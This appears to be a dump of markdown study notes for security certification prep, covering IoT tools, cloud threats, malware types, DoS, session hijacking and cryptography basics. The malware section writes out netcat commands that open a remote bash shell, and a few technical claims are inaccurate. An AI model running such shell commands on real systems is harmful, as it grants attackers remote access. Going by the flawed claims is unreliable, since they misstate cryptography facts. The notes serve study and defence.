  - Z-Wave Sniffer
  - beSTORM: vulnerability scanning tool, smart fuzzer to find buffer overflows
  - RFCrack: obtaining rolling codes
  - Attify: attacking Zigbee networks
  - HackRF One: advanced hardware and software; performs BlueBorne or AirBorne attacks, such as replay, fuzzing, jamming etc.
  - Firmware Mod Kit: reconstructing firmware images for embedded devices
  - Firmalyzer Enterprise: performing automated security assessment of the software that powers IoT device firmware
- Security Tools
  - SeaCat.io: SaaS to operate IoT products
  - DigiCert IoT Security Solution

--------------------------------------------------------------------------------
/09-security_in_cloud_computing.md:
--------------------------------------------------------------------------------

# 09-Security in Cloud Computing

## Table of Contents

- [Security in Cloud Computing](09-security_in_cloud_computing.md#security-in-cloud-computing)
  - [Cloud Computing Basics](09-security_in_cloud_computing.md#cloud-computing-basics)
    - [Characteristics](09-security_in_cloud_computing.md#characteristics)
    - [Limitations](09-security_in_cloud_computing.md#limitations)
    - [Three Types of Cloud Computing Services](09-security_in_cloud_computing.md#three-types-of-cloud-computing-services)
      - [IaaS \(Infrastructure as a Service\)](09-security_in_cloud_computing.md#iaas-infrastructure-as-a-service)
      - [PaaS \(Platform as a Service\)](09-security_in_cloud_computing.md#paas-platform-as-a-service)
      - [SaaS \(Software as a Service\)](09-security_in_cloud_computing.md#saas-software-as-a-service)
    - [Deployment Models](09-security_in_cloud_computing.md#deployment-models)
    - [NIST Cloud Architecture](09-security_in_cloud_computing.md#nist-cloud-architecture)
  - [Cloud Security](09-security_in_cloud_computing.md#cloud-security)
    - [Main Threats](09-security_in_cloud_computing.md#main-threats)
    - [Attacks](09-security_in_cloud_computing.md#attacks)

## Security in Cloud Computing

### Cloud Computing Basics

#### Characteristics

- On-demand self service
- Distributed storage
- Rapid elasticity
- Automated management
- Broad network access
- Resource pooling
- Measured service: pay-per-use
- Virtualization technology

#### Limitations

- Organizations have limited control and flexibility
- Prone to outages and other technical issues
- Security, privacy, and compliance issues
- Contracts and lock-ins
- Dependent on network connections

#### Three Types of Cloud Computing Services

| On-Premises | IaaS | PaaS | SaaS |
| :------------- | :--- | :--- | :--- |
| App | | | x |
| Data | | | x |
| Runtime | | x | x |
| Middleware | | x | x |
| O/S | | x | x |
| Virtualization | x | x | x |
| Servers | x | x | x |
| Storage | x | x | x |
| Networking | x | x | x |

##### IaaS \(Infrastructure as a Service\)

- Providing virtualized computing resources
- A third party hosts the servers, with a hypervisor running the VMs as guests
- Subscribers usually pay on a per-use basis

##### PaaS \(Platform as a Service\)

- Geared towards software development
- Hardware and software hosted by the provider
- Provides the ability to develop without having to worry about hardware or software

##### SaaS \(Software as a Service\)

- Provider supplies on-demand applications to subscribers
- Offloads the need for patch management, compatibility and version control

#### Deployment Models

- **Public Cloud**: services provided over a network that is open for the public to use
- **Private Cloud**: cloud solely for use by one single tenant; usually done in larger organizations
- **Community Cloud**: cloud shared by several organizations, but not open to the public
- **Hybrid Cloud**: a composition of two or more cloud deployment models

#### NIST Cloud Architecture

- **Cloud Consumer**: acquires and uses cloud products and services
- **Cloud Provider**: purveyor of products and services
- **Cloud Carrier**: organization with the responsibility of transferring data; akin to a power distributor for the electric grid
- **Cloud Auditor**: performs independent examination of cloud service controls
- **Cloud Broker**: manages use, performance and delivery of services, as well as relationships between providers and subscribers

```text
Provider <-----------------------
   ^   |                         | IaaS, PaaS, SaaS
   |   | IaaS, PaaS, SaaS        | and other services
   |   |                         |
   |   |                         |
Auditing Service v     Brokered Service v
Auditor <------------------> Broker <------------------> 
Customer 96 | ^ 97 | | 98 | | Physical 99 | | Infrastructure 100 | | 101 | v 102 | Carrier 103 | ``` 104 | 105 | ### Cloud Security 106 | 107 | - Problem with cloud security is what you are allowed to test and what should you test 108 | - Another concern is if the hypervisor is compromised, all hosts on that hypervisor are as well 109 | - Tools 110 | - Qualys Cloud Platform: end-to-end IT security solution 111 | - CloudPassage Halo: instant visibility and continuous protection for servers in any cloud 112 | - Core CloudInspect: pen-testing application for AWS EC2 users 113 | 114 | #### Main Threats 115 | 116 | - **Data Breach or Loss**: biggest thraet 117 | - Abuse of Cloud Resources 118 | - Insecure Interfaces and APIs 119 | - Insufficient due diligence: moving an application without knowing the security differences 120 | - Shared technology issues: multi-tenant environments that don't provide proper isolation 121 | - Unknown risk profiles: subscribers simply don't know what security provisions are made in the background 122 | - Others including malicious insiders, inadequate design and DDoS 123 | 124 | #### Attacks 125 | 126 | - **Service Hijacking** 127 | - Using Social Engineering Attacks 128 | - - Using Networking Sniffing 129 | - **Session Hijacking** 130 | - Using XSS Attack 131 | - Using Session Riding: basically CSRF 132 | - **DNS Attacks** 133 | - DNS Poisoning 134 | - **Cybersquatting**: conducting phishing scams by registering a domain name that is similar to a cloud service provider 135 | - **Domain Hijacking**: stealing a cloud service provider's domain name 136 | - **Domain Snipping**: registering an elapsed/past domain name 137 | - **Side Channel Attack** or **Cross-guest VM Breach** 138 | - Using an existing VM on the same physical host to attack another 139 | - This is more broadly defined as using something other than the direct interface to attack a system 140 | - **SQL Injection Attack**: targeting SQL servers running vulnerable database 
applications 141 | - **Cryptanalysis Attack**: weak or broken encryption, weak random number generation 142 | - **Wrapping Attack**: SOAP message intercepted and data in envelope is changed and sent/replayed 143 | - **DoS** and **DDoS Attack** 144 | - **Man-in-the-Cloud \(MITC\) Attack**: carried out by abusing cloud file synchronization services, plants attacker's synchronization token on victim's drive to gain access of victim's files 145 | -------------------------------------------------------------------------------- /10-malware_and_other_attacks.md: -------------------------------------------------------------------------------- 1 | # 10-Malware and Other Attacks 2 | 3 | ## Table of Contents 4 | 5 | - [Malware and Other Attacks](10-malware_and_other_attacks.md#malware-and-other-attacks) 6 | - [Malware](10-malware_and_other_attacks.md#malware) 7 | - [Malware Basics](10-malware_and_other_attacks.md#malware-basics) 8 | - [Trojan](10-malware_and_other_attacks.md#trojan) 9 | - [Types of Trojans](10-malware_and_other_attacks.md#types-of-trojans) 10 | - [Some Trojan Port Numbers](10-malware_and_other_attacks.md#some-trojan-port-numbers) 11 | - [Tools](10-malware_and_other_attacks.md#tools) 12 | - [Virus](10-malware_and_other_attacks.md#virus) 13 | - [Types of Viruses](10-malware_and_other_attacks.md#types-of-viruses) 14 | - [Worm](10-malware_and_other_attacks.md#worm) 15 | - [Analyzing Malware](10-malware_and_other_attacks.md#analyzing-malware) 16 | - [Static Analysis](10-malware_and_other_attacks.md#static-analysis) 17 | - [Dynamic Analysis](10-malware_and_other_attacks.md#dynamic-analysis) 18 | - [Heuristic Analysis](10-malware_and_other_attacks.md#heuristic-analysis) 19 | - [Tools](10-malware_and_other_attacks.md#tools) 20 | - [Preventing Malware](10-malware_and_other_attacks.md#preventing-malware) 21 | - [DoS \(Denial of Service\) Attacks](10-malware_and_other_attacks.md#dos-denial-of-service-attacks) 22 | - [Basic 
Categories](10-malware_and_other_attacks.md#basic-categories) 23 | - [Tools](10-malware_and_other_attacks.md#tools) 24 | - [Session Hijacking](10-malware_and_other_attacks.md#session-hijacking) 25 | - [Steps](10-malware_and_other_attacks.md#steps) 26 | - [Countermeasures](10-malware_and_other_attacks.md#countermeasures) 27 | - [IPsec \(Internet Protocol Security\)](10-malware_and_other_attacks.md#ipsec-internet-protocol-security) 28 | - [Tools](10-malware_and_other_attacks.md#tools) 29 | 30 | ## Malware and Other Attacks 31 | 32 | ### Malware 33 | 34 | #### Malware Basics 35 | 36 | - Software designed to harm or secretly access a computer system without informed consent 37 | - Most is downloaded from the Internet with or without the user's knowledge 38 | - **Overt Channels**: legitimate communication channels used by programs 39 | - **Covert Channels**: used to transport data in unintended ways 40 | - **Wrappers**: programs that allow you to bind an executable to an innocent file 41 | - Example: IExpress Wizard 42 | - **Crypters** 43 | - Using a combination of encryption and code manipulation to render malware undetectable to security programs 44 | - Example: BitCrypter 45 | - **Packers** 46 | - Compressing the executable into a smaller size, and obscure the actual program, which helps evade signature based detection 47 | - **Entry point** of an executable may refer to a named section of code where the label is the name of a packer 48 | - **Droppers**: installing other malware files on to system either from malware package or Internet 49 | - **Downloader**: downloading other malware from Internet on to PC 50 | - **Injector**: injecting its code into other vulnerable running process and changes the way of execution in order to hide or prevent removal 51 | - **Obfuscator**: concealing its code, makes it hard for security mechanisms detect or remove it 52 | - **Exploit Kit**: helping to deliver exploits and payloads, like Crimepack 53 | 54 | #### Trojan 55 | 56 | - 
Software that appears to perform a desirable function but instead performs malicious activity 57 | - To hackers, it is a method to gain and maintain access to a system 58 | - Trojans are means of delivery whereas a backdoor provides the open access 59 | 60 | ##### Types of Trojans 61 | 62 | - **Remote Access Trojan** \(RAT\): providing attackers with full control over the victim's system, enabling them to remotely access files, private conversations, accounting data, and others 63 | - PoisonIvy 64 | - MoSucker 65 | - Blackhole 66 | - **Backdoor Trojan**: RAT has UI, the client component, whereas a backdoor does not 67 | - **Botnet Trojan**: infecting numerous of computers across a large geographical area to create a network of bots that is controlled through a Command and Control \(C&C\) center 68 | - Necurs 69 | - Mirai 70 | - **E-banking Trojans**: intercepting victim's account informed before the system can encrypt it, and send it to the attacker's C&C center 71 | - Zeus 72 | - **Proxy Server Trojan**: usually a standalone application that allows remote attackers to use the victim's computer as a proxy to connect to the Internet 73 | - **Covert Channel Tunneling Trojan** \(CCTT\): a RAT, creating arbitrary data transfer channels in previously authorized data streams 74 | - **Defacement Trojan**: once spreading over the system, can destroy or change the entire content present in a database 75 | - **Command Shell Trojan**: providing a backdoor to connect to through command-line access 76 | - **Netcat** 77 | - "Swiss army knife" of tcp/ip hacking 78 | - Providing all sorts of control over a remote shell on a target 79 | - Can connect over TCP or UDP, from any port 80 | - Offering DNS forwarding, port mapping and forwarding and proxying 81 | - Connect: `nc -e IPaddress Port#` 82 | - Open a listening port on 55555 from target machine: `nc -l -p 5555 -e /bin/bash` 83 | - **CryptCat**: encrypted version of netcat 84 | 85 | ##### Some Trojan Port Numbers 86 | 87 | | 
Trojan Name | Port | 88 | | :---------------- | :------ | 89 | | Death | 2 | 90 | | Senna Spy | 20 | 91 | | Hackers Paradise | 31,456 | 92 | | TCP Wrappers | 421 | 93 | | Doom, Santaz Back | 666 | 94 | | Silencer, WebEx | 1001 | 95 | | RAT | 1095-98 | 96 | | SubSeven | 1243 | 97 | | Shiva-Burka | 1600 | 98 | | Trojan Cow | 2001 | 99 | | Deep Throat | 6670-71 | 100 | | NetBus | 12345-6 | 101 | | Whack a Mole | 12361-3 | 102 | | Back Orifice | 31337,8 | 103 | 104 | ##### Tools 105 | 106 | - **Process Explorer** \(PE\): Microsoft tool that shows you everything about running processes 107 | - **Registry Monitoring Tools** 108 | - SysAnalyzer 109 | - Active Registry Monitor 110 | - Regshot 111 | - **Tripwire**: integrity verifier that can act as a HIDS in protection against Trojans 112 | - **SIGVERIF**: building into Windows to verify the integrity of the system 113 | - Log file can be found at c:\windows\system32\sigverif.txt 114 | - Looking for drivers that are not signed 115 | 116 | #### Virus 117 | 118 | - Self-replicating program that reproduces by attaching copies of itself into other executable code 119 | - Usually installed by user clicking on malicious file attachments or downloads 120 | 121 | ##### Types of Viruses 122 | 123 | - **Virus Hoax**: a kind of bluff and false alarm claiming reports about nonexistent viruses to cause fear 124 | - **Fake Antivirus**: trying to convince a user has a virus and have them download an AV that is a virus itself 125 | - **Ransomware**: malicious software designed to deny access to a computer until a price is paid; usually spread through email 126 | - **Locky**: Using RSA-2048 and AES-128 to lock files 127 | - **WannaCry**: famous ransomware, within 24 hours had 230,000 victims, exploited unpatched SMB vulnerability 128 | - **Petya-NotPetya**: spreading over network using WMIC \(Windows Management Instrumentation Command-line\) by capturing all credentials from local machine using Mimikatz 129 | - **Boot Sector Virus**: known 
as system virus, moving boot sector to another location and then inserts its code in the original location 130 | - **Shell Virus**: wrapping around an application's code, inserting itself before the application's 131 | - **Cluster Virus**: modifying directory table entries so every time a file or folder is opened, the virus runs 132 | - **Multipartite Virus** 133 | - Attempting to infect both boot sector and files 134 | - Generally referring to viruses with multiple infection methods, or executing different in different places on target at the same time 135 | - **Macro Virus**: written in VBA, infects template files, mostly MS Word and MS Excel 136 | - **Polymorphic Code Virus**: mutating its code by using a polymorphic engine; difficult to find because code is always changing 137 | - **Encryption Virus**: using encryption to hide the code from antivirus 138 | - **Metamorphic Virus**: rewriting itself every time it infects a new file 139 | - Win32/ Simile 140 | - Zmist: Mistfall is the first virus uses technique called code integration. 
This code inserts itself into other code and regenerates code and rebuilds the executable 141 | - **Stealth Virus**: known as tunneling virus, attempts to evade AVs by actively altering and corrupting the service call interrupts while running 142 | - **Cavity Virus**: overwriting portions of host files as to not increase the actual size of the file; uses null content sections 143 | - **Armored Virus**: containing a variety of mechanisms specifically coded to make its detection and decryption very difficult 144 | - **Companion/Camouflage Virus**: spoofing a scanner by camouflaging itself to the identical file name as targeted program file 145 | - **Cluster Virus**: modifying directory table entries so that it points users or system processes to the virus code instead of the actual program 146 | - **Sparse Infector Virus** 147 | - Only infecting occasionally, like every tenth program executed 148 | - Deciding which file to infect based on certain conditions, like target file with max. size of 128kb 149 | - **File Extension Virus**: changing the file extensions of files to take advantage of most people having them turned off \(readme.txt.vbs shows as readme.txt\) 150 | - **Logic Bomb Virus**: triggered by a response to an event, such as launching an application or when a specific date/time is reached 151 | 152 | #### Worm 153 | 154 | - Self-replicating malware that sends itself to other computers without human intervention 155 | - Usually doesn't infect files, just resides in active memory 156 | - Often used in botnets 157 | 158 | ### Analyzing Malware 159 | 160 | - **Sheep Dip**: referring to analysis of suspect files 161 | - **Sheep Dip Computer**: installed with port monitors, file monitors, network monitors and antivirus software, connects to a network only under strictly controlled conditions 162 | 163 | #### Static Analysis 164 | 165 | - Dismantling of a given executable into binary format to study its functionalities and features 166 | - Tools 167 | - 
HashMyFiles: file fingerprinting 168 | - VirusTotal: online malware scanning 169 | - PEiD: identifying packing/obfuscation methods 170 | - Dependency Walker: listing all dependent modules of an executable file 171 | - IDA Pro: disassembler and debugger 172 | 173 | #### Dynamic Analysis 174 | 175 | - Running malware and identifying changes to the system, usually in a sandbox environment 176 | 1. Make sure you have a good test bed 177 | - Use a VM with NIC in host-only mode and no open shares 178 | 2. Analyze the malware on the isolated VM in a static state 179 | - Tools - binText and UPX help with looking at binary 180 | 3. Run the malware and check out processes 181 | - Use Process Monitor, etc. to look at processes 182 | - Use NetResident, TCPview or even Wireshark to look at network activity 183 | 4. Check and see what files were added, changed, or deleted 184 | 185 | #### Heuristic Analysis 186 | 187 | - Detecting new or unknown viruses that are usually variants of an already existing virus family 188 | - Drawback: too many false positives 189 | - Can be static or dynamic 190 | - **Static Heuristic Analysis**: The anti-virus analyzes the file format and code structure to determine if the code is viral 191 | - **Dynamic Heuristic Analysis**: The anti-virus performs a code emulation of the suspicious code to determine if the code is viral 192 | 193 | #### Tools 194 | 195 | - IDA Pro 196 | - Anubis 197 | - Threat Analyzer 198 | 199 | ### Preventing Malware 200 | 201 | - Make sure you know what is going on in your system 202 | - Have a good antivirus that is up to date 203 | - **DEP** \(Data Execution Prevention\): prevents from accidentally executing a potentially malicious batch or PowerShell script in Windows 204 | - **DLP** \(Data Loss Prevention\): a strategy for preventing end users from sending sensitive or critical information outside of the corporate network 205 | 206 | ### DoS \(Denial of Service\) Attacks 207 | 208 | - Seeking to take down a system or 
deny access to it by authorized users 209 | - **Botnet**: network of zombie computers a hacker uses to start a distributed attack 210 | - Can be controlled over HTTP, HTTPS, IRC, or ICQ 211 | 212 | #### Basic Categories 213 | 214 | - **Fragmentation Attack**: taking advantage of the system's ability to reconstruct fragmented packets 215 | - **Volumetric Attack**: bandwidth attack, consuming all bandwidth for the system or service 216 | - **Application Attack** 217 | - Consuming the resources necessary for the application to run 218 | - Application level attack is against weak code 219 | - Application attack is just the general term 220 | - **TCP state-exhaustion Attack**: going after load balancers, firewalls and application servers by attacking connection state tables 221 | - **SYN Flood**: sending thousands of SYN packets with fake source IP address and not responding to the SYN/ACK packets; lots of half connections where the 3-way hanndshake is never completed; eventually target runs out of resources 222 | - **ICMP flood**: sending ICMP ECHO packets with a spoofed address; eventually reaches limit of packets per second sent 223 | - **Smurf**: sending large number of pings to the broadcast address of the subnet with source IP spoofed as the target, entire subnet responds exhausting the target; using ICMP ECHO requests 224 | - **Fraggle**: same as Smurf but with UDP packets 225 | - **Ping of Death**: fragmenting ICMP messages, after reassembled, ICMP packet is larger than the maximum size and crashes the system 226 | - **Teardrop**: overlapping numerous garbled TCP/IP fragments with oversized payloads, causes older systems to crash due to fragment reassembly 227 | - **Phlashing**: also known as bricking a system, causing permanent damage to a system 228 | - **LAND Attack** \(Local Area Network Denial\): sending a TCP SYN packet to the target with a spoofed IP the same as the target; if vulnerable, target loops endlessly and crashes 229 | - **DDoS** \(Distributied 
Denial of Service\): incoming traffic flooding the victim originates from many different sources 230 | - **DRDoS** \(Distributied Reflexion Denial of Service\): using IP spoofing, the source address is set to targeted victim, which means all the replies will go to the target and flood the target 231 | - **Slowloris**: trying to keep many connections to the target web server open and hold them open as long as possible 232 | 233 | #### Tools 234 | 235 | - Low Orbit Ion Cannon \(LOIC\): DDoS tool that floods a target with TCP, UDP or HTTP requests 236 | - Trinity: Linux based DDoS tool 237 | 238 | ### Session Hijacking 239 | 240 | - Attacker waits for a session to begin and after the victim authenticates, steals the session for himself 241 | - Predicting can be done by knowing the window size and the packet sequence number 242 | - Also can be done via brute force, calculation or stealing 243 | 244 | #### Steps 245 | 246 | 1. Sniff the traffic between the client and server 247 | 2. Monitor the traffic and predict the sequence numbering 248 | 3. Desynchronize the session with the client 249 | 4. Predict the session token and take over the session 250 | 5. 
Inject packets to the target server 251 | 252 | #### Countermeasures 253 | 254 | - Using unpredictable session IDs 255 | - Limiting incoming connections 256 | - Minimizing remote access 257 | - Regenerating the session key after authentication 258 | - Using **IPsec** to encrypt 259 | 260 | #### IPsec \(Internet Protocol Security\) 261 | 262 | - **Transport Mode** 263 | - Payload and ESP trailer are encrypted, not IP header 264 | - Can be used in NAT because the original packet is still routed in exactly the same manner as it would have been without IPsec 265 | - **Tunnel mode** 266 | - Everything is encrypted 267 | - Cannot be used with NAT 268 | - **Architecture Protocols** 269 | - **Authentication Header**: guarantying the integrity and authentication of IP packet sender 270 | - **Encapsulating Security Payload** \(ESP\): providing origin authenticity and integrity as well as confidentiality 271 | - **Internet Key Exchange** \(IKE\): producing the keys for the encryption/decryption process, port 500 272 | - **Oakley**: using Diffie-Hellman to create master and session keys 273 | - **Internet Security Association Key Management Protocol** \(ISAKMP\): software that facilitates encrypted communication between two endpoints 274 | 275 | #### Tools 276 | 277 | - **Ettercap**: man-in-the-middle tool and packet sniffer on steroids 278 | - **Zaproxy** 279 | - **Paros proxy** 280 | - **Burp Suite** 281 | - **Hamster** 282 | - **IKE-scan**: IPsec VPN scanning and fingerprinting tool 283 | -------------------------------------------------------------------------------- /11-cryptography.md: -------------------------------------------------------------------------------- 1 | # 11-Cryptography 2 | 3 | ## Table of Contents 4 | 5 | - [Cryptography](11-cryptography.md#cryptography) 6 | - [Cryptography Basics](11-cryptography.md#cryptography-basics) 7 | - [Classical Ciphers](11-cryptography.md#classical-ciphers) 8 | - [Modern Ciphers](11-cryptography.md#modern-ciphers) 9 | - [Based 
on type of key used](11-cryptography.md#based-on-type-of-key-used) 10 | - [Based on type of input data](11-cryptography.md#based-on-type-of-input-data) 11 | - [Cryptanalysis Methods](11-cryptography.md#cryptanalysis-methods) 12 | - [Code Breaking Methodologies](11-cryptography.md#code-breaking-methodologies) 13 | - [Encryption Algorithms and Techniques](11-cryptography.md#encryption-algorithms-and-techniques) 14 | - [Encryption types in OSI](11-cryptography.md#encryption-types-in-osi) 15 | - [Symmetric Encryption](11-cryptography.md#symmetric-encryption) 16 | - [DES \(Data Encryption Standard\)](11-cryptography.md#des-data-encryption-standard) 17 | - [3DES \(Triple Data Encryption Standard\)](11-cryptography.md#3des-triple-data-encryption-standard) 18 | - [AES \(Advanced Encryption Standard\)](11-cryptography.md#aes-advanced-encryption-standard) 19 | - [RC \(Rivest Cipher\)](11-cryptography.md#rc-rivest-cipher) 20 | - [Blowfish](11-cryptography.md#blowfish) 21 | - [Twofish](11-cryptography.md#twofish) 22 | - [Asymmetric Encryption](11-cryptography.md#asymmetric-encryption) 23 | - [RSA \(Rivest–Shamir–Adleman\)](11-cryptography.md#rsa-rivestshamiradleman) 24 | - [Diffie-Hellman](11-cryptography.md#diffie-hellman) 25 | - [ECC \(Elliptic Curve Cryptosystem\)](11-cryptography.md#ecc-elliptic-curve-cryptosystem) 26 | - [Public Key Infrastructure \(PKI\)](11-cryptography.md#public-key-infrastructure-pki) 27 | - [Components of PKI](11-cryptography.md#components-of-pki) 28 | - [PKI Process Flow](11-cryptography.md#pki-process-flow) 29 | - [Digital Certificates](11-cryptography.md#digital-certificates) 30 | - [Digital Signatures](11-cryptography.md#digital-signatures) 31 | - [Digital Signature workflow](11-cryptography.md#digital-signature-workflow) 32 | - [Full Disk Encryption \(FDE\)](11-cryptography.md#full-disk-encryption-fde) 33 | - [Encrypted Communication](11-cryptography.md#encrypted-communication) 34 | - [Secure Sockets Layer 
\(SSL\)](11-cryptography.md#secure-sockets-layer-ssl) 35 | - [Channelsecurity](11-cryptography.md#channelsecurity) 36 | - [SSL/TLS handshake process](11-cryptography.md#ssltls-handshake-process) 37 | - [Transport Layer Security \(TLS\)](11-cryptography.md#transport-layer-security-tls) 38 | - [Two Layers](11-cryptography.md#two-layers) 39 | - [PGP \(Pretty Good Privacy\)](11-cryptography.md#pgp-pretty-good-privacy) 40 | - [PGP Encryption and Decryption Workflow](11-cryptography.md#pgp-encryption-and-decryption-workflow) 41 | - [Cryptography Attacks](11-cryptography.md#cryptography-attacks) 42 | - [Hash Algorithms](11-cryptography.md#hash-algorithms) 43 | - [MD5 \(Message Digest algorithm\)](11-cryptography.md#md5-message-digest-algorithm) 44 | - [SHA \(Secure Hash Algorithms\)](11-cryptography.md#sha-secure-hash-algorithms) 45 | - [RIPEMD \(RACE Integrity Primitives Evaluation Message Digest\)](11-cryptography.md#ripemd-race-integrity-primitives-evaluation-message-digest) 46 | - [Attacks](11-cryptography.md#attacks) 47 | - [Steganography](11-cryptography.md#steganography) 48 | - [Methods](11-cryptography.md#methods) 49 | - [Ways to Identify](11-cryptography.md#ways-to-identify) 50 | - [Tools](11-cryptography.md#tools) 51 | 52 | ## Cryptography 53 | 54 | ### Cryptography Basics 55 | 56 | - Science or study of protecting information whether in transit or at rest 57 | - Rendering the information unusable to anyone who can't decrypt it 58 | - Taking plain text, applies cryptographic method, turn it into cipher text 59 | - **Cipher**: an algorithm performing encryption and decryption 60 | 61 | #### Classical Ciphers 62 | 63 | - **Substitution**: bits are replaced by other bits 64 | - **Transposition**: not replacing, simply changes order 65 | 66 | #### Modern Ciphers 67 | 68 | ##### Based on type of key used 69 | 70 | - **Private Key**: same key used for encryption and decryption 71 | - **Public Key**: 2 different keys used for encryption and decryption 72 | 73 | ##### 
Based on type of input data 74 | 75 | - **Block Cipher** 76 | - Data bits are split up into blocks and fed into the cipher 77 | - Each block of data \(usually 64 bits\) is encrypted with key and algorithm 78 | - Simpler and slower than stream ciphers 79 | - Key chosen for cipher must have a length larger than the data, if not, it is vulnerable to frequency attacks 80 | - **Stream Cipher** 81 | 82 | - Readable bits are encrypted one at a time in a continuous stream 83 | - Working at a high rate of speed 84 | - Usually done by an XOR operation \(exclusive or\) 85 | 86 | ```text 87 | 0 XOR 0 = 0 88 | 1 XOR 1 = 0 89 | 0 XOR 1 = 1 90 | 1 XOR 0 = 1 91 | ``` 92 | 93 | #### Cryptanalysis Methods 94 | 95 | - Study and methods used to crack cipher text 96 | - **Linear Cryptanalysis** 97 | - Working best on block ciphers 98 | - Given enough pairs of plaintext and corresponding ciphertext, key can be obtained 99 | - **Differential Cryptanalysis** 100 | - Applying to symmetric key algorithms 101 | - Comparing differences in the inputs to how each one affects the outcome 102 | - Working with **chosen plaintext** originally, also works with **known plaintext and ciphertext** 103 | - **Integral Cryptanalysis** 104 | - Useful against block ciphers 105 | - Input vs Output comparison same as differential, however, runs multiple computations of the same block size input 106 | 107 | #### Code Breaking Methodologies 108 | 109 | - **Brute Force**: exhaustive search, keys are determined by trying every possible combination of characters 110 | - **Frequency Analysis**: study of the frequency of letters or groups of letters in a ciphertext, can be used to crack a substitution cipher, like rotation cipher ROT13 111 | - **Trickery and Deceit** 112 | - Requiring a high level of mathematical and cryptographic skills 113 | - Using social engineering techniques to trick someone to encrypt and send a known message 114 | - **One-time Pad** 115 | - Assuming to be unbreakable 116 | - A shared random 
key that has to be the same length or longer than the cipher text 117 | - Each individual bit or character of plaintext is encrypted by combining it with the corresponding bit or character from the pad using modular addition 118 | - **Drawback**: key length is same as that of message, impossible to encrypt and send large messages 119 | 120 | ### Encryption Algorithms and Techniques 121 | 122 | - **Algorithm**: step-by-step method of solving a problem 123 | - **Encryption Algorithms**: mathematical formulas used to encrypt and decrypt data 124 | - Keys should still change on a regular basis even though they may be "unhackable" 125 | - Per U.S. Government, an algorithm using at least a 256-bit key cannot be cracked 126 | 127 | #### Encryption types in OSI 128 | 129 | | Encryption type | OSI layer | 130 | | :--------------------------------------- | :---------------------------------------------------- | 131 | | Link encryption | 2, everything including original headers is encrypted | 132 | | Network encryption | 3, everything in the packet is encrypted | 133 | | Protocol encryption | 4, specific protocols are entirely encrypted eg. 
SSL |
| Service based encryption | 5, encryption for specific services on specific hosts |
| Data encryption | 6 |
| Application based information encryption | 7 |

### Symmetric Encryption

- One key is used to encrypt and decrypt the data, known as single key or shared key
- Problems include key distribution and management
- Suitable for large amounts of data
- Harder for groups of people because more keys are needed as the group grows
- Provides nothing for non-repudiation, only confidentiality

#### DES \(Data Encryption Standard\)

- Block cipher, 56-bit key, 64-bit block size
- Quickly outdated and now considered not very secure
- Kerberos 1-4 used DES

#### 3DES \(Triple Data Encryption Standard\)

- Block cipher, 168-bit key
- More effective than DES but much slower
- 3 keys are used:
  - 1st key is used to encrypt the plain text
  - 2nd key is used to decrypt the ciphertext resulting from the first round of encryption
  - 3rd key is used to encrypt the ciphertext that resulted from the decryption with the 2nd key

#### AES \(Advanced Encryption Standard\)

- Iterated block cipher, 128, 192 or 256 bit key, 128-bit block size
- Symmetric key algorithm
- Works by repeating the same operation multiple times
- Replacing DES, much faster than DES and 3DES
- Original name is Rijndael

#### RC \(Rivest Cipher\)

- RC4 is a symmetric key **stream** cipher
- RC5 is a parameterized algorithm with variable block size, 128-bit key, 2-bit working registers
- RC6 is a symmetric key block cipher, uses integer multiplication and 4-bit working registers

#### Blowfish

- Fast symmetric block cipher, 64-bit block size, 32 to 448 bits key
- Replaced by AES
- Considered public domain

#### Twofish

- Block cipher, 128-bit block, up to 256 bit key

### Asymmetric Encryption

- Using two different keys for encryption and decryption
- One key encrypts, the other decrypts
- The private key is used to digitally sign a message

#### RSA \(Rivest–Shamir–Adleman\)

- Achieving strong encryption through the use of two large prime numbers
- Factoring two prime numbers to create key sizes up to 4096 bits
- Modern de-facto encryption standard
- **Downside**: slower than symmetric encryption, especially on bulk encryption, and needs more processing power

#### Diffie-Hellman

- Developed as a key exchange protocol
- Used in SSL and IPsec
- If digital signatures are waived, vulnerable to MITM attacks

#### ECC \(Elliptic Curve Cryptosystem\)

- Using points on an elliptic curve along with the discrete logarithm problem
- Using less processing power, smaller keys, good for mobile devices

### Public Key Infrastructure \(PKI\)

- Structure designed to verify and authenticate the identity of individuals
- **Cross-Certification**
  - Allowing a CA to trust another CA in a completely different PKI
  - Allowing both CAs to validate certificates from either side
- **Single-authority system**: CA at the top that creates and issues certificates
- **Hierarchical trust system**
  - CA at the top \(root CA\)
  - Making use of one or more RAs \(subordinate CAs\) underneath it to issue and manage certificates

#### Components of PKI

- **Certificate Management System**: generates, distributes, stores, and verifies certificates
- **Validation Authority** \(VA\): used to validate certificates, stores certificates with their public keys
- **Certificate Authority** \(CA\): third party to issue and verify digital certificates
  - Comodo
  - IdenTrust
  - Symantec
  - GoDaddy
- **End user**: requests, manages, and uses certificates
- **Registration Authority** \(RA\): acts as verifier for the certificate authority

#### PKI Process Flow

A user applies for a certificate with his public key at an RA. The RA confirms the user's identity to the CA, which in turn issues the certificate. The user can then digitally sign a contract using his new certificate. His identity is then checked by the contracting party with a VA, which in turn receives information about issued certificates from the CA.

```text
              Cert. info
     --------> CA --------------------------> VA
     |         |                              |^
     |OK       |                              ||
     |         |                              ||
     RA        |Cert. OK                      || Cert.
     ^         |                              ||
     |Pub. K   |                              ||
     |         v       Sign with Cert.        v|
     --------- User ---------------> Contracting Party
```

### Digital Certificates

- **Certificate**: electronic file that is used to verify a user's identity, provides non-repudiation
- **Non-repudiation**: a recipient can ensure the identity of the sender and neither party can deny sending
- **X.509**: standard used for digital certificates, public key encryption
- **Self-Signed Certificates**
  - Not signed by a CA
  - Signed by the same entity it certifies
  - Generally not used for public use, used for development purposes
  - Certificate verification rarely occurs due to the necessity of disclosing the private key

### Digital Signatures

- Unforgeable and authentic
- When signing a message, you sign it with your **private** key and the recipient decrypts the hash with your **public** key
- **Digital Signature Algorithm** \(DSA\): used in generation and verification of digital signatures per FIPS 186-2

#### Digital Signature workflow

```text
- Sign
                  Hashing Algo.                      Digital Sign
  Message -------------------> Message ---------------------------------> Message
                               + hash value   using sender's PRIVATE key  + signed hash

- Seal
                      Encrypt                                Seal
  ----------------> Encrypted message ----------------------------> Sealed message
  using one-time    + symmetric key     Encrypt symmetric key
  symmetric key                         using recipient's PUBLIC key

- Open
                         Decrypt                                    Decrypt
  Sealed message ---------------------------> Encrypted message --------------------> Message
                 with recipient's PRIVATE key + symmetric key    with symmetric key  + signed hash

- Verify
           Unlock signed hash                 Rehash message & Compare
  -------------------------> Message ----------------------------> Verified message
  with sender's PUBLIC key   + Hash value
```

### Full Disk Encryption \(FDE\)

